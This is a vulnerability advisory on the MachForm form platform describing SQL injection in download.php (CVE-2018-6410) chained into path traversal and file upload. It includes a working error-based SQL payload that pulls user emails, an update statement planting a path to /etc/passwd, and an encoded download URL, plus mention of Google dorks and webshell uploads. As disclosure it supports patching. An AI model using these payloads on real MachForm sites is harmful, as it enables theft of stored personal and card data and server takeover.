Summary:
---------
The form creation platform MachForm from Appnitro is subject to SQL
injections that lead to path traversal and arbitrary file upload.

The application is widely deployed and with some google dorks itâ??s
possible to find various webpages storing sensitive data as credit
card numbers with corresponding security codes. Also, the arbitrary
file upload can let an attacker get control of the server by uploading
a WebShell.

[1] SQL injection (CVE-2018-6410):
-------------------------

[1.1] Description:
The software is subject to SQL injections in the â??download.phpâ?? file.

[1.2] Parameters and statement:
This SQLi can be found on the parameter â??qâ?? which a base64 encoded
value for the following parameters:

Which is the base64 encoding for:
el= (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x2020,(SELECT
MID((user_email),1,50) FROM ap_users ORDER BY user_id LIMIT
0,1),0x2020,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS
GROUP BY x)a) ;&id=1&hash=1&form_id=1

[2.1] Descrition
download.phpâ?? is used to serve stored files from the forms answers.
Modifying the name of the file to serve on the corresponding ap_form
table leads to a path traversal vulnerability.

[2.2] POC
First we need to change the name for the element on the form:
update ap_form_58009 set
element_4="../../../../../../../../../../../../../../../../etc/passwd"
where id=1;

Now in order to be able to download it, we need to access:
http:// [URL] / [Machform_folder]
/download.php?q=ZWw9NCZpZD0xJmhhc2g9NDAyYmEwMjMwZDZmNDRhMmRlNTkwYWMxMTEw
N2E0NTgmZm9ybV9pZD01ODAwOQo=

Which is the base64 encoding for;
el=4&id=1&hash=402ba0230d6f44a2de590ac11107a458&form_id=58009

Note that hash is the MD5 of the corresponding filename:
md5("../../../../../../../../../../../../../../../../etc/passwd") =
402ba0230d6f44a2de590ac11107a458